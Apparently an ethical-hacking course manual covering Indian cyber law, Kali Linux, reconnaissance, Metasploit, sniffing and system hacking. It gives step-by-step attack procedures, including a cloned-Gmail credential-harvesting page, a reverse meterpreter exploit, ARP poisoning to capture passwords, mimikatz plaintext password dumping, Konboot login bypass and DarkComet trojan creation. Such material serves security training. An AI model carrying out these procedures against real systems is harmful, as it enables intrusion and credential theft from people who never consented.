1. Section 66
Offence: - Computer related offences like fraud, dishonesty etc.
Penalty: - Imprisonment may extend to 2-3 years or with fine which may extend to five Lakh rupees
or with both.
2. Section 66A
Offence: - Sending Offensive mails, message and IP Spoofing
Penalty: - Punishment for three years or fine also.
3. Section 66B
Offence: - Data theft from Computers
Penalty: - Three Years Punishment or One Lakh rupees charge or both
4. Section 66C
Offence: - Password Stealing, Electronic signature stealing etc.
Penalty: - Three Years Punishment or One Lakh rupees charge or both
5. Section 66D
Offence: - Cheating person using computer or communication resources
Penalty: - Three Years Punishment or One Lakh rupees charge or both
6. Section 67
Offence: Punishment for publishing or transmitting obscene material in electronic form
Penalty: - 2-5 Years Punishment or 5-10 Lakh rupees charge.
7. Section 67A
Offence: - Publishing Sexual content.
Penalty: - 5-7 Years Punishment with fine which may exceed to Ten Lakh rupees
8. Section 68
Power of controllers to give directions
Offence: - Any person who intentionally or knowingly fails to comply with any orders of
Controllers.
Penalty: - Imprisonment of Two Years or fine not exceeding One Lakh rupees or both
9. Section 69
Govt. has Power to issue directions for interception or monitoring or decryption of any information
through any computer resource.
Offence: - Any Authorized body who intentionally or knowingly fails to do it.
Penalty: - Imprisonment may exceed seven Years or fine.
10. Section 70
Offence: - Violating privacy of protected system
Penalty: - Imprisonment may exceed Ten Years or fine.
11. Section 70A
National Nodal Agency
Designate any organisation of govt. as National Nodal Agency which shall be responsible for all
including Research and Development related to protection of critical information Infrastructure.
12. Section 72A
Offence: - Disclosure of information in breach of lawful contract
Penalty: - Imprisonment may exceed Three Years or fine which may extend to five Lakh rupees, or
both.
13. Section 77
Compensation, penalties or confiscation not to interfere with other punishment No compensation
awarded, penalty imposed or confiscation made under this Act shall prevent the award of
compensation or imposition of any other penalty or punishment under any other law for the time
being in force.

14. Section 78
Power to investigate offenses
A police officer not below the rank of Inspector shall investigate any offence under this Act.
Module 4
Kali Linux Terminology
Introduction

Kali Linuxis an advanced Penetration Testing and Security Auditing Linux based OS. It is a
complete re-build of BackTrack, completely to Debian development standards. All the new
infrastructure has been developed, all tools were reviewed and packaged, and only top 10 tools took
to develop as advanced penetration Testing OS.

Download kali Linux from the Below Link

=> http://kali.org/downloads

Insatallation of Kali Linux


** Before Starting the process of Kali Linux Installation, Download VmwareWorkstation and
Install it int your System.

Default root Password


During installation, Kali Linux allows users to configure a password for the root user. However,
should you decide to boot the live image instead, the i386, amd64, VMWare and ARM images are
configured with the default root password toor, without the quotes
Follow the steps to install kali Linux in Vmware Workstation
1. Start Vmware Workstation and Click on "Create New Virtual Machine".
2. Select "Typical" and click on "Next".
3. Select Installation Media type and click on "Next".
4. Give your Machine a name and Choose location where you want save it.
5. Specify Disk Size.
6. Click on Finish or click on customize if want to make any changes with Virtual Machine
7. Choose Install Option
8. Choose Language
9. Choose Keyboard Type or else keep by Default
10. Select Country and hit enter for installation

**Now its insalling all the needed packages


11. Set Host Name, give any name
12. Set "Root" user Password
13. Create any User and give Password
14. Set Time Zone".
15. Choose partition for installing kali Linux.
**Now everything is done. Wait for some time to finish Installattion.
16. Once got finished with installation its asks to restarts. Now welcomes with a login page. Log in
with Root.
17. List of Top Security Tools.

Vmware tool:- By defualt there will no support for hardware, due to lack of vmware tool. Once we
install vmware tool, we will get all hardware support along with full screen and mouse integration.
Following are the steps to install vmware tools for kali linux.

1. Go to VM-->>Install Vmware tools

2. Open Terminal and copy vmware tools compressed file to desktop


3. Move to desktop

4. Extract files.
5. Move to extracted files directory.

5. Install vmware tool and keep press enter if ask for anything untill u get the command promt back.
After successfully done restart system.
Module 5
Information Gathering
Introduction
Information gathering is first step of Tenetration Testing. It is the act collecting the required
information about the target by using various resources.

Active Information Gathering


Information gathering done by directly interacting with the targets to grab more information about
them.
Ex: port scanning using NMAP

Passive Information Gathering


Information gathering done by indirectly with out interacting the targets and its belongings.
Ex: Searching target resources from publicly available data

Tools for Information Gathering

Dnsdict6: It is used to gather and enumerate information which are publicly restricted.It is avilable
in kali linux and back track
Feautures:
Detects information about sub domain
Enumeration of Ipv4 and Ipv6
Enumeration of SRV records
Enumeration of Name Server and Mail Server records
Procedure:

To open Dnsdict6 in shell just type dnsdict6.It will show the help guide.
To find sub domains: dinsdict6 -4 domainname
ex: dinsdict6 -4 yahoo.com

To enumerate the DNS records : dnsdict6 -d domainname


ex: dnsdict6 -d yahoo.com
It will give the DNS,Name Server and Mail Server information.
To enumerate SRV Service Records :dnsdict6 -S domainname
ex: dnsdict6 -S yahoo.com
SRV record is the specification for data in DNS,it gives the host names and port numbers

Conclusion:

dnsdict6 is used for enumerating DNS records.it reaveals vast inforation related to DNS and
subdomains.

Dnsenum:

It is use to gather information regarding the domain.it is available in kali linux and backtrack.

Features:
Gives the host address
Name server information
Mx record information
Time zone transfer information
Sub domains information via google scraping
Brute force the sub domains from the files
Reverse lookups
To open dnsenum,type dnsenum in shell prompt
ex:dnsenum

To find the host information,name servers,MX,zone and additional information,type


dnsenum domain name(not need of www before domain name)
ex:dnsenum yahoo.com
To get sub domains using goolgle scraping,type dnsenum -p 5 -s 20 domain name

-p -> pages
-s -> scrap

To brute force the sub domain ,type dnsenum -f dnslist.txt domain name
-f ->file name

Dnsmap

It is the passive network mapper usually used to brute force the subdoamins.we can find the
sub domains associated to doamin.it is helpful to find remote access servers ,misconfigured servers
and new domain names.

Features:

It supports Ipv6
Gives complete ip addresses of successfully bruteforced subdoamins
Discovers connected embedded devices configured with DNS services
Bruteforcing by using wordlist
Delay option added to save bandwidth
Results can be saved in CSV format

To open dnsmap,type dnsmap in shell prompt


ex:dnsmap

To save results in text file,type dnsmap domain name -r path


ex:dnsmap google.com -r /root/

To bruteforce subdoamins by own wordlist,type dnsmap domainname -w


wordlistname.txt
ex:dnsmap google.com -w mywordlist

Fierce:

Fierce is a perl script written by Rsnake for information gathering.

Feautures:
It used for discover non-contiguous IP address and reconnaissance
It used for DNS transfer zone,DNS brute force, reverse lookups
It used for enumeration and gather much information regarding the target system
It is available in kali linux and backtarck

To open fierce,type fierce -h in shell prompt.it will the complete options.


ex:fierce -h

To find the Name Server,Zone Transfer etc information about target.Type fierce dns
domain
ex: fierce -dns google.com
Maltego:

Maltego is opensource tool for gathering maximum information regarding networks,domains,people


and many more. It can be available in both Kali linux and BackTrack

Features:

It gives the collection of information posted all over the internet.


It provides the unprecedented information
It allows us to enumerate network and domain information
It allows us to search email,search blog,incoming links,meta data and etc..
it allows us to enumerate with persons email adresses,phone numbers,social groups

To open Maltego, Applications -> Kali linux -> Information Gathering -> DNS analysis
->Maltego

At first we need to register,if there is no account in maltego and we need to activate our
account
Maltego while running,at first we need to login

Give login credentials


It will show welcome page along with login results
After successfull login,it opens like this way

click on -> 1.Manage icon


-> 2.expand infrastructure and drag Domain
we can change the domain by double click on the domain and enter teh new domain name

Right click on domain icon and click ->Run Trandform ->All Transforms->To
website(Quick lookup)
To find the ipaddress if our target website
Right click on the icon which appeared -> Run Transform -> Resolve to IP -> To Ip
Address(DNS)
To find Ip Address related to domain
->Run Transform -> All Tranforms ->Mirror:Email address found
To remove items completly,press cntrl + A and press Delete key
Google and its working
Google is world famous search engine.It is famous for simplicity,searching methodologies,relevant
results,identifying ads ,sponsored links,identifying cyber attacks and filtering spam.

How it works ?
Google bot for web crawling.It uses the web crawling bot to find and retrive pages relative to the
search results from the web and gives them to google indexer.
Google bot finds pages in two ways:
Through an add url form www.google.com/addurl.htm
Finding the links by crawling the web.

Google indexer:
It gives the indexer to the full text for pages it finds.These all pages are stored in googles
index database.
Index stores alphabetically by search item with each index entry storing a list of documents.
Google query processor:

It evaluates the search queries and matches them to relevant items.


Google uses google page ranks.the page having highest page rank appears first in the result.
Google considers nearly 200 factors for page ranking like popularity,content,size and search
terms etc..,

Dorks for Google Hacking:


Google dorks are used to filter the results as per our search requirement.
Web Resource: www.exploit-db.com/google-dorks
cache: Google will search with in cache document
link: list webpages that have links to specified website
related:show webpages that are similar to the website
info: gives the information by the google
define: definition of the words
stocks:shows the stock information
site:pages in the specified web site
allintitle: Filter the results with respect to word in the url
intitle:
allinurl:
inurl:

Google Hacking Tools:


Search Diggity v3
Bing Hacking Database
Sharepoint Google and Bing Hacking Dictionary Files
GHDB Reborn Dictionaries Exploit-DB
SHODAN Hacking Databse-SHDB

Web Crawling Tools:


Bingbot
FAST crawlwr
Googlebot
Polybot
RBSE
WebCrawler
WebFountain
WebRACE
World Wide Web Worm
Yahoo Slurp
GNUWget
Heritrix
HTTRACK
Google as a vulnerability scanner:
Web Based Footprinting:
BlogPulse
Pipl :https://pipl.com
Spy
Serph
Monitter:Real time twitter monitoring

Addons and Tool Based Footprinting


Hackbar
Tamper Data
DOM Inspector
HTTP Live Header
Fire Bug

Sites for Footprinting


Netcraft
Yougetsignal
Spiderfoot
Dnsstuff
MxToolbox
Module 6
Scanning and Enumerations
Scanning
Foot printing the first stage of hacking
We need additional information regarding the target system so we are doing scanning
Scaning refers to identifying the hosts,ports,service network

Types of Scanning
Port Scanning: To find open ports and services
Network Scanning: To find Ip address and their ranges
Vulnerability Scanning:To find the weaknesses

TCP/IP 3Hand Shake


The TCP three-way handshake in Transmission Control Protocol (also called the
TCP-handshake).Here we send three handshake messages (SYN,SYN+ACK,ACK).

NMAP
Network Mapped (Nmap) is a network scanning and host detection tool that is very useful during
several steps of penetration testing.It scans the network by sending different types of packet
requests.it is also powerful utility that can be used as a vulnerability detector or a security scanner.

Host discovery
Discovery or enumeration
Service discovery
Operating system, hardware address, and the software version
Nmap scripts

Resource:http://nmap.org
NMAP scaning techniques:
To start scan using nmap, just type nmap along with ip address.

To scan only particular ports,use option 'p'

nmap target/cidr nmap 192.168.1.1/24


Nmap Syn Scan:

It is also called half-open scanning because this technique allows Nmap to get information
from the remote host without the complete TCP handshake process.

Nmap sends SYN packets to the destination, but it does not create any sessions.

The target computer cant create any log of the interaction because no session was initiated.
It completes the normal TCP three way handshake process and requires the system to call
connect.

To find an open UDP port of the target machine. It does not require any SYN packet to be
sent because it is targeting the UDP ports.
A FIN scan sends the packet only set with a FIN flag, so it is not required to complete the
TCP handshaking.

nmap -sF 192.168.1.8

To find version ,nmap -sV 192.168.1.1

To idle scan, nmap -sI zombie_host target_host

To detect OS detection,nmap -o ipaddress

Evading firewall/ IDS

Firewalls and IDS (intrusion detection systems) normally play an important role to defend
the remote target very well from a security point of view

There are two types of firewall that might be installed on the target computer:

Host based firewall (A firewall is running on a single target computer, for example you are
running a firewall on your computer)

Network based firewall (A firewall has been installed and is running to protect the entire
network and has been deployed at the node of the network, it might be LAN)

TCP Window Scan (-sW) the TCP window scan has been designed to differentiate between
open and closed ports instead of showing unfiltered.
nmap -sW 192.168.1.9

Fragment Packets (-f)


The parameter of this technique is -f, it just split the request into small segments of IP
packets called the fragmented IP packets
map n -f 192.168.1.9

TCP ACK Scan (-sA):Send the ACK packets rather than the SYN packets.
Four types of responses:

Open port (few ports in the case of the firewall)


Closed port (most ports are closed because of the firewall)
Filtered (Nmap is not sure whether the port is open or not)
Unfiltered (Nmap can access the port but is still confused about the open status of the port)
TCP ACK Scan (-sA)nmap -sA 192.168.1.9

Spoof MAC Address :nmap spoof-mac Cisco 192.168.1.3

MAC address spoofing creates a very difficult situation for the victim to identify the
computer who originated the incoming request.

Nmap scripting
Nmap scripts can perform so many different functions from vulnerability scanning to
exploitation and from malware detection to brute forcing. In this section I will discuss some
of the best Nmap scripts and their usage:

Nmap script smb-check-vulns -p445 ipaddress

nmap -sV script=http-enum 127.0.0.1

nmap script=samba-vuln-cve-2012-1182 -p 139 target

nmap -sV script=smtp-strangeport target

nmap -sV script=http-php-version target

Scanning using hping

Hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired by


the ping(8) Unix command. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute
mode, the ability to send files between a covert channel, and many other features.All header fields
can be modified and controlled using the command line.
Firewall testing
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Manual path MTU discovery
Advanced traceroute, under all the supported protocols
Remote OS fingerprinting
Remote uptime guessing
TCP/IP stacks auditing
hping can also be useful to students that are learning TCP/IP.

Crafting TCP packets is the default behavior of Hping. By specifying the TCP flags, a destination
port and a target IP address, one can easily construct TCP packets.
-F fin set FIN flag
-S syn set SYN flag
-R rst set RST flag
-P push set PUSH flag
-A ack set ACK flag
-U urg set URG flag
-X xmas set X unused flag (040)
-Y ymas set Y unused flag (080)

Enumeration
Enumeration is the first attack on target network, enumeration is the process to gather the
information about a target machine by actively connecting to it.It means to identify the user
account, system account and admin account. Enumerating windows active directory to find out
these stuffs.

SNMP (Simple Network Management Protocol) an application-layer protocol for managing


TCP/IP based networks. SNMP runs over UDP (which runs over IP).

MIB (Management Information Base) provides a standard representation of the SNMP agents
available information and where it is stored.

NMS (Network Management Station) A device designed to poll SNMP agents for information.

SNMP Agent a device running some software that understands the language of SNMP. Almost
any network device could potentially run SNMP, but typically you will find SNMP agents running
on internetworking devices (eg. routers, hubs, switches, bridges). Some operating systems (UNIX,
Windows NT) can also run SNMP agents.

Snmpcheck
Snmpcheck allows you to enumerate the SNMP devices . It could be useful for penetration testing
or systems monitoring. Distributed under GPL license and based on "Athena-2k" script by jshaw.

Ex:snmpcheck -t ipaddress
Snmpenum
Ex:perl snmpenum.pl ip address Public windows.txt
Module 7
Hiding Identity
Hiding Identity
Why Hackers Use Proxy and VPNs?
Hackers use proxy and VPN to hide their identity while performing Attacks so that instead of
original IP proxy IP will be stored on logs.

UltraSurf

UltraSurf is a product of Ultrareach Internet Corporation. Originally created to help internet users in
China find security and freedom online, UltraSurf has now become one of the world's most popular
anti-censorship, pro-privacy software, with millions of people using it to bypass internet censorship
and protect their online privacy.

Working with UltraSurf

You can download this application from this source: - http://ultrasurf.us


Tor Proxy (Anonymous Proxy)

Working with Tor browser Proxy (windows platform)


Download Tor browser bundle from here http://www.torproject.org.in
Hotspot Shield VPN

VPN creates a secure tunnel between our machine and VPN Gateway, allow you to surf internet
securely. This VPN is Available for free and paid users both.

Working with Hotspot Shield VPN

Download Hotspot shield VPN from its official website http://www.hotspotshield.com/en

Now to check what IP address is assigned to you by Hotspot Shield VPN


Open site http://whatismyipaddress.com and check IP address.
Module 8
Social Engineering Toolkit
What is Social engineering tool kit (SET) ?
SET is the process of making people to give away access or confidential information. Internet
defines as "is the act of manipulating people into performing actions or divulging confidential
information. It is to do a confidence trick or simple fraud, applies to trickery for the purpose of
information gathering, fraud, or computer system access. In many cases the attacker never comes
face-to-face with the victim."Always use type of trick called SET like offering a "free pizza","free
coffee". aspects social engineering actually touches on many parts of daily life.From a security
standpoint, it is more a collection of tools and techniques that range from negotiation, sales,
psychology and ethical hacking.

Why We Use Set ?


Most of the Attackers never come directly toward Victim and grab the information. They use some
social engineering techniques to collect information from victim. A attacker send a fake post letter
to victim to confirm weather he is at home or not. In daily life we are seeing many types of Social
engineering trics which ever cant know after the effect.

All the Social Engineering Tricks Combined together and made a took kit to Hacker's called SET
( Social engineering tool kit ) in Back track and Kali linux

Go to application Backtrack Exploitation tools Social Engineering Tools Social


Engineering Toolkit set.
Types of Social Engineering Attack
The spear-phishing attack vectors
The web attack vectors
Infectious Media Generator
Mass Mailer Attack
Arduino-Based Attack Vector
SMS Spoofing Attack Vector
Wireless Access point Attack Vector
QRcode Generator Attack Vector
Powershell Attack Vectors

The Spear Phishing Attack Vectors

Spear phishing is an e-mail spoofing fraud attempt that targets a specific organization, seeking
unauthorized access to confidential data. Those are not typically initiated by "random hackers" but
more likely to be conducted by perpetrators out for financial gain, trade secrets or military
information. As with the e-mail messages used in regular phishing messages appear to come from a
trusted source. Phishing messages usually appear to come from a large and well-known company or
Web site.

The Web Attack Vector

It is a path or means by which a hacker (or) cracker can gain access to a computer or network
server in order to deliver a payload or something malicious which harm pc/server. Attack vectors
enable hackers to exploit system vulnerabilities, including the human element. It includes viruses,
e-mail attachments, Web pages, pop-up windows, instant messages, chat rooms, adn adds. All the
methods involve programming and in a few cases uses hardwares too. To some xtent, firewalls and
anti virus can block attack vectors. But no protection method is totally attack-proof. Defense
method is effective today it may not remain so long, because hackers are constantly updating attack
vectors and seeking new things, in their quest to gain unauthorized access to computers and servers.
The most common malicious payloads are virus, trojan, worms, and spyware.

Infectious Media Generator

The most majority of people having at least one USB drive to transfer files and a common
characteristic of all humans is curiosity. These two things together can create a huge threat which
can affect any company. This type of attack allows hacker to create a USB,DVD/CD with a
malicious content when user opens the file in his company then the payload will executed and it
will return a shell in to pc of user. This type of attack doesnt require any knowledge and it is very
fast and easy to implemented by anyone. This means that anyone that can plant a malicious USB
stick inside a company can be a potential threat. It also points out how a simple USB or DVD can
bypass the network perimeter and can become a threat for any company if the employees are not
following the security policies. For example companies should have a policy that would protect
them against any mobile threats and the employees should follow that policy.
Mass Mailer Attack

Sending emails in bluk to large number. Sending some malicious or harmfull mails to number of
people at a time. For mass mailing we can create a file with one email address per line, So you can
create a template and use it when you need it. Finally for sending the emails you have two options
GMAIL or your own server and open relay.

Arduino-Based Attack Vector

This Attack Vector utilizes the Arduin-based device to program the device. You can leverage the
Teensys, which have onboard storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboards it will bypass any autorun disabled or
endpoint protection on the system. You will need to purchase the Teensy USB device; its roughly
$22 dollars. This attack vector will auto generate the code needed in order to exploit the payload on
the system for you. This attack vector will create the .pde files necessary to import into Arduino.The
attack vectors range from Powershell based downloaders, wscript attacks, and other methods.

SMS Spoofing Attack Vector

SMS Spoofing Attack allows you to send a crafted SMS messages to a person. You can spoof the
SMS source. You can use a predefined template or create your own template. The main method for
this would be to convince a user to click the link in their browser and steal credentials or perform
other attack vectors. You can send SMS to a single number or import a file that will send the SMS
to all of them.

Wireless Access point Attack Vector

This will create a fake access point to your wireless card and redirect to all DNS queries to you.
SET will create a wireless access point, dhcp server, and spoof DNS to redirect traffic to the
attacker machine from network plcae. You can run any attack vector you want, when a victim joined
to attackers access point tries going to a website, the DNS spoof will redirect the victim to
attackers machine.

QRcode Generator Attack Vector

It a type of attack on the base of QRcode. In this attack vector a Qrcode genrates with malicious
link. Now send it to victim by mail using SET. When Victim scan Qrcode the attack payload will
deploy in to victim machine, Now we can get the access of the victim machine.

Powershell Attack Vectors

The Powershell Attack Vector allows you to create PowerShell specific attacks. These attacks will
allow you to use PowerShell which is available by default in all operating systems Windows
Vista/win7 all versions and above. PowerShell provides a fruitful landscape for deploying payloads
and performing functions that do not get triggered by preventative technologies.
How to Perform Social Engineering Attack

How to start SET in Back track

Go to applications backtrack exploitation tools Social engineering tools Social


engineering toolkit set.

We are having 7 different opitions. Use 1st opition as Social engineering attacks.
Now we can fine 11 opitions in Social engineering Attacks, choose opition 2nd for website attack
vector

Under Website attack vector we can find 9 opitions. Select 6st opition as web jacking attack method.
Select 2nd opition as site cloner

Asking to enter ip address to reverse connetion mentions the bt ip and enter a site you want to clone
example www.gamil.com and enter

Now make the victim to enter your ip in url bar to open gmail as shown below

Aafter clicking the url which appears in the above windows a fake gmail.com will appears.

Commonly victim enters his Username and password. Once he entered the username and password
automaticly those credientials displays in attacker machine as shown below image.
Prevention Against Social Engineering

Social engineering describes primarily non-technical threats to company security. The broad
nature of these potential threats necessitates providing information about threats and potential
defenses to a range of management and technical staff within a company, including

Need to Keep up to date.

Best Antivirus
Should not download any software or any stuff from untrusted sites
Download only from offical pages
Always scan for virus, worms and trojans
Scan and download updates for Os
Module 9
Advance Metasploit Exploitation
Metasploit

Metasploit was created by HD Moore in 2003 as a portable network tool using Perl. In year 2007,
the Metasploit Framework had been completely rewritten in Ruby. Metasploit is available in
Backtrack and kali linux.

Metasploit Terms
Exploit security flaw within a system, network, or application.
Payload- code executed in victime system by metasploit
Module- code can be added to the metasploit framework to execute an attack.
Shellcode code used as a payload.

Metasploit Framework
steps for exploiting a system using the Framework :
Choosing and configuring an exploit
Check the target system is exploit or not
Choosing and configuring a payload
Choosing the encoding technique to bypass IDS/IPS
Executing the exploit

Metasploit Interfaces
Metasploit Framework Edition
Metasploit Community Edition
Metasploit Express
Metasploit Pro
Armitage
Cobalt Strike

Payloads
Metasploit conatains many different types of payloads,each have the unique identity
Inline(Non staged)
Staged
Meterpreter
PassiveX
NoNX(No execute)
Ordinal Payloads
IPv6
Reflective DLL injection

Opcode Database
Opcode Database is an important resource for writers of new exploits.For Buffer overflow exploits
on Windows often require knowledge of the position of certain machine language opcodes in
program.Positions differ in the various versions and patch-levels of a given operating system. They
all are documented and conveniently searchable in the Opcode Database. This is useful to write
buffer overflow exploits that work across different versions of the target.

Shellcode Database
The Shellcode database contains the payloads used by the Metasploit Framework for the
exploitation.

To start metasploit,Type msfconsole. It will load all the modules.

We can find exploits information

To start exploiting on the target,


[1]at first,we need to use the exploit,we are exploiting the windows xp system by using the netapi
exploit
[2] we need to set the victim ip address as a RHOST
[3]we need to set payload for reverse ip connection
[4]we need to configure the LHOST ,its the attacker Ip
[5]we are going to exploiting the system by typing exploit
[6]Finally we are attempting to trigger the exploit
Meterpreter shell invoked and showing the victim windows prompt
Module 10
Armitage and Fast Track Exploitation
Armitage
It is the GUI version for the Metasploit,which visualize the targets,exploits and post exploitations.
Source: http://www.fastandeasyhacking.net/
Features:
we can perform following steps with out using any additional tools,
Foot printing
Scanning
Enumeration

Installation and usage


It is pre-installed in Backtrack
In kali linux we need to install,use apt-get install armitage
To start armitage,first we need to start postgresql database.Type service postgresql
start[1] in shell.
Type armitage in shell prompt[3]
Window will appear[3],click on connect[4].

It is going to start Metasploit[5],click on Yes[6] to continue


Armitage window will open,
To scan any particular host move to Hosts -> Nmap Scan ->Quick Scan(OS detect)
Give the Individual ip address or complete network range
It will diplay the connected devices in the network
To find possible Attacks ,click on Attacks-> Find Attacks
It checks the vulnerabilities

After succesful exploitation,it will shows that particular system in red color,means its
attacked.
Fasttrack
Fast-Track is a tool for exploiting.it uses other pentest tools to make easy exploration.
It is available in three different forms:
CLI
Web interface
Interactive

To start Fasttrack web , Menu -> Backtrack -> Exploitation Tools -> Network Exploitation
Tools -> Fast track ->Fasttrack -interactive
This the main menu of the Fast track
Select option '8' to create payload

To create Reverse_Tcp Meterpreter select option '2'


To encode our payload, use option '2'
Select option,to create an executable or shellcode

So,the created payload will save in /pentest/exploits/fasttrack


Module 11
Sniffing
Introduction
A packet analyzer (also known as a network analyzer,protocol analyzer or packet sniffer, or for
particular types of networks, an Ethernet sniffer or wireless sniffer) is a computer programme or a
piece of computer hardware that can intercept and log traffic passing over a digital network or part
of a network. As data streams flow across the network, the sniffer captures each packet and, if
needed, decodes the packet's raw data, showing the values of various fields in the packet, and
analyzes its content according to the appropriate RFC or other specifications.Packet capture is the
process of intercepting and logging traffic.

A programe or a device that capture vital information from the network traffic specific to a
particular network. Its is data interception technology.

Objective of sniffig is to steal :


Passowrds of E-mail, web, SMB, FTP, and SQL
Email text
Files in transfer (Email files, FTP files or SMB )

Types of sniffing attacks


MAC attack
DHCP attack
DNS poisoning
ARP poisoning Attack

Wireshark
It is a network packet sniffer and analyzer. A network packet analyzer will try to capture network
packets and tries to display that packet data as detailed as possible.You could think of a network
packet analyzer as a measuring device used to examine what's going on inside a network cable, just
like a voltmeter is used by an electrician to examine what's going on inside an electric cable (but at
a higher level, of course). In the past, such tools were either very expensive, proprietary, or both.
However, with the advent of Wireshark, all that has changed.Wireshark is perhaps one of the best
open source packet analyzers available today.
How to install wireshark

Download from http://www.wireshark.org/

Run the wireshark application

Click next
Click I Agree

Click next with check boxes


Click next

Browse where to install the wireshark select and click next


Check the install winPcap box to get install WinPcap which I used to capture the packets and click
Install

This is how winPcap install


Installation of wireshark is completed click next .

You can Run application by just checking the box, click Finish.
This is how interface of wireshark looks.
1 Interface list : where we can select to sniff a particular interface packets
2 start : after selecting the interface just click it, to start sniffing
3 capture options : selection for types of packets
4 open : we can open a dump file of saved packets

This is the area where we need to give tags of wireshark


Examples
Ip.src==192.168.0.0/20 and ip.dst==192.168.0.0/20
Show only traffic in the LAN (192.168.0.0/0)

host 192.168.x.x
Capture only traffic to or from IP address 192.168.x.x

Ip.addr ==(googl ip)

Its show only the packets which connects to google.com


Networkminor

It is a Network Forensic Analysis Tool (NFAT) for Windows but alsoworks on Linux and Mac OS.
It can be used as a passive network sniffer or packet capturing tool in order to detect operating
systems, sessions, hostnames, open ports etc. without putting any traffic on the network. It collects
data like forensic evidence about hosts on the network rather than to collect data regarding the
traffic on the network. It has, since the first release in 2007, become popular tool among incident
response teams as well as law enforcement.

How to install

Download a free edition from http://www.netresec.com/

Extract Networkminor

Run networkminor application

**Note: Always run as administrator


Now select interface (adapter )
Select the interface you need to sniff, click start to start sniffing.

After starting sniffing we can see the list of host as well as we can extract .
We can see complete details of host just by extracting the host.

Another few more options we can check it out like Frames, files, images, Messages, Credentials,
Session s, DNS and Parameters.

Cain and Abel


It is a tool to recovery of passwords. It cracks the passwords very easily by sniffing the network
taffic. Cracking like encrypted passwords using Dictionary, Brute-Force and Cryptanakysis attacks,
recording VoIP conversations, recovers wireless networs keys. Its main objective is to recover of
passwords from various sources.

How to install Cain and Abel

1. Download it from here.


http://www.oxid.it/cain.html
2. Just Install it in your system, this tool is available for different platform like windows, Linux
etc. Once installed you can see its GUI interface like below.
3. The following steps will guide to sniff Traffic Complete traffic
Open Cain & Abel
Click on Sniffer Tab and Turn on it from a Button Present in Toolbar Above.
4. Now It's time to Add Host present in Your network. Click On + sign and click ok To Add
Host.

5. Next is Arp Poisoning where we will route all Network to go through from our PC and then
To outside World So that We can Sniff All traffic. To Do Arp poisoning Follow these Steps.
Click On Arp TAB at the bottom of Cain & Abel and then Select Host Whose traffic we
want to sniff by clicking on + Sign Before Click On + button click on any white space
Area to Activate + Sign.
Now Finally click on Start/Stop Arp to Poison Traffic.

6. Analyse traffic and Get Sensitive information like Password, URL Visited etc.
Click on Password tab located just Above the Status Bar. At the left hand side you can
choose which traffic you want analyse.
It will show username and password if anyone entered.
Module 12
System Hacking
How to bypass Windows Security

For this we need KON boot tool which is freely available. Just prepare a bootable pen drive with
the konboot image file. Preparing a bootable USB with Konboot in it
The just follow the steps below,
1. Open UNetbootin tool and follow the steps

2. Choose Disk image


3. Choose the disk image format as Floppy
4. Browse the Konboot-v 1.1.img file
5. Choose your bootable medium as USB Drive
6. Choose the location of your USB ( It differs on different computer like H:\ E:\ etc., )
7. Click OK
Now your bootable disk is ready Which has Konboot in it.

Using Konboot to bypass Windows Security

1. Now we a have a USB drive which has been prepared for booting up.
2. Restart the computer in which you have forgotten your password or the system which is
password protected.
3. Get in to Boot menu when the computer restarts by pressing the F12 key (
This may differ in some computer )

4. Choose the first boot disk as your USB disk.

5. Once you have booted from your USB Pendrive, You will see a page of Konboot.
Then just press Enter. You will be taken to a screen like this.
6. After this screen your computer will resume its normal booting and you will be
logged in the admin account without the login screen, It temporarily removes the passwords of the
computer. This is how a Hacker gets into a system by bypassing the security of Windows Security
Logon .
Upgrade Version of Konboot can be used to bypass Windows Security of Windows Vista, 7 & 8

Windows Password in Plain Text

Cracking Passwords is difficult if we have only limited time on a machine, But a new technique
which extracts the password in plaint text is possible by exploiting a windows flaw. This method
works in all windows version from windows XP to the latest windows 8.
The tool can be found online or in the tool kit. The Tool and its other use can be found
online at http://blog.gentilkiwi.com/mimikatz

1. Once we have the tool, Place it in a folder

Then Right Click on the Tool mimikatz and run as Administrator. Once we run
the tool, we get a command prompt like interface.

4. Now enter the command privilege::debug in the command windows.

6. Now enter the command sekurlsa::logonPasswords full and press enter.


7. Now we get the password of the current user in plain text format as shown
below.

How to prevent System Hacking

To protect your computer from these attacks, the following steps are to be
followed.
1. Create a Hard-Disk BOOT Password, in the Boot menu which comes during the
Startup.
2. Use SAM Lock Tool to Encrypt your Passwords ( Type syskey in run command
box to get it )
3. Create a complex password which has Numbers, Symbols and Both cases of
Alphabets.
Like this one P@.s5w%0Rdfl$ and not like this password123 !
4. Use Drive Encryption Tools to protect your Data from being modified or
damaged.
5. Do not keep your password written on the table of your computer or anywhere
nearby !
Setting up a Secure System

A system can be secured if the following methods are followed while setting up a
system.
1. Use Original Operating Systems and not Pirated.
2. Dont use Pirated or Cracked versions of Antivirus.
3. Setup a Boot Password for BIOS and Hard-disk to prevent intruders
4. Update your OS, Antivirus and Firewall programs regularly.
5. Install Add-ons which help you to be secure in web (E.g., WOT, Antiphishing, No
script etc., )
6. Use updated Browsers and use password protected browsers
7. Use Drive Encryption tools to protect your data .
8. Secure your Important documents and files using Encryption methods
9. Be careful when installing software downloaded from free forums or websites.
Module 13
Virus, Trojans and Keyloggers
What is a Trojan

A Trojan or a Trojan Horse is a is a malicious application that acts like a legitimate file or helpful
program but whose real purpose is, for example, to grant a hacker unauthorized access to a
computer. Trojans do not attempt to inject themselves into other files like a computer virus. Trojan
horses may steal information, or harm their host computer systems.

Most of the Trojan contains two important parts,

1. Server Part - ( Installed on Victim Infectious File )


2. Client Part ( Used to Control the Victim using a Control Panel )

Different way a Trojan Can Get Into A System

A Trojan is mostly designed in such a way that it appears to be a legitimate software and it can
infect your system silently. There are several methods that a Trojan can implement to infect your PC

They are as follows,

Instant Messenger applications


IRC (Internet Relay Chat)
Attachments
Physical access
Browser and email software bugs
FileSharing
Fake programs
Untrusted sites and freeware software
Cracks & Keygens used for Software piracy
Cracked versions of paid softwares.
Images and files like mp3,3gp, mp4 etc via untrusted sources

DarkComet
Darkcomet is Remote Access Trojan which can perform several functions in the victims PC once
infected. It has the following functionalities,
1. Keylogger
2. Webcam Control
3. File Manager
4. Initiate FTP Connection
5. Monitor all process
6. Open any WebPages remotely

Creating the Trojan

Use a Virtual machine to try and create a Trojan, because the Trojan creator can itself be a Trojan.

1. Open the Darkcomet creator


2. Click on Edit Server to create a server

All settings are provided to customize your Trojan


